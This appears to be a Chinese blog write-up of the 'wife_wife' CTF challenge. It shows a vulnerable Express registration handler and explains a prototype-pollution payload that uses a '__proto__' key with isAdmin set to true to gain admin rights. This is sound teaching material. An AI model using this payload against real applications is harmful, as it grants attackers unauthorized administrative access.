【攻防世界】wife_wife

原型链污染

源码

python 复制代码
app.post('/register', (req, res) => {
    let user = JSON.parse(req.body)
    if (!user.username || !user.password) {
        return res.json({ msg: 'empty username or password', err: true })
    }
    if (users.filter(u => u.username == user.username).length) {
        return res.json({ msg: 'username already exists', err: true })
    }
    if (user.isAdmin && user.inviteCode != INVITE_CODE) {
        user.isAdmin = false
        return res.json({ msg: 'invalid invite code', err: true })
    }
    let newUser = Object.assign({}, baseUser, user)
    users.push(newUser)
    res.json({ msg: 'user created successfully', err: false })
})

let newUser = Object.assign({}, baseUser, user)的作用把baseUser和user的属性合并后拷贝到{}中,即newUser是baseUser和user的集合体。baseUser猜测是user类似父类的东西,user应该就是上面的{"username":"b","password":"b","isAdmin":false}部分了 。

Object.assign 这个方法是可以触发原型链污染的,然后污染 __proto__.isAdmin 为 true 就可以了。在注册页面,构造payload

原型链污染不太准确的理解就是"父类影响子类",一个子类继承于父类后,父类有什么属性子类就有什么属性。比如这里我们的注册信息data按照json的形式传入,JSON.parse后得到一个对象。这个对象有3个键名,username,password和__proto__。比较容易搞混的地方来了,这个__proto__是键名,单纯是个键名,值为{"isAdmin":true},而不是类的原型对象prototype。这点很重要,如果我们把测试代码稍微修改一下:

php 复制代码
let baseUser={};
//let data='{"username":"e","password":"e","__proto__":{"isAdmin":true}}';
//let user= JSON.parse(data);
let user={"username":"e","password":"e","__proto__":{"isAdmin":true}};
console.log(user);
console.log(user.isAdmin); //输出true,导致进入下面的if语句将isAdmin强行改为false
let INVITE_CODE="whatever";
if (user.isAdmin && user.inviteCode != INVITE_CODE) {
        user.isAdmin = false
}
let newUser = Object.assign({}, baseUser, user) //那这里的原型链污染也没用了,子类后定义的属性值会覆盖父类的
console.log(newUser.isAdmin);

console.log(user.isAdmin);尝试读取isAdmin属性时会顺着上去找父类的,得到true,进入if语句赋值就没用了。总之就是记住,原型链污染需要在JSON解析的情况下进行

wife_wife ctf-CSDN博客

相关推荐
xuxie1337 分钟前
SpringBoot文件下载(多文件以zip形式,单文件格式不变)
java·spring boot·后端
星期天要睡觉42 分钟前
Linux 综合练习
linux·运维·服务器
重生成为编程大王1 小时前
Java中的多态有什么用?
java·后端
666和7771 小时前
Struts2 工作总结
java·数据库
saynaihe1 小时前
proxmox8升级到proxmox9
linux·运维·服务器
gnip1 小时前
js上下文
前端·javascript
中草药z1 小时前
【Stream API】高效简化集合处理
java·前端·javascript·stream·parallelstream·并行流
野犬寒鸦1 小时前
力扣hot100:搜索二维矩阵 II(常见误区与高效解法详解)(240)
java·数据结构·算法·leetcode·面试
zru_96021 小时前
centos 系统如何安装open jdk 8
java·linux·centos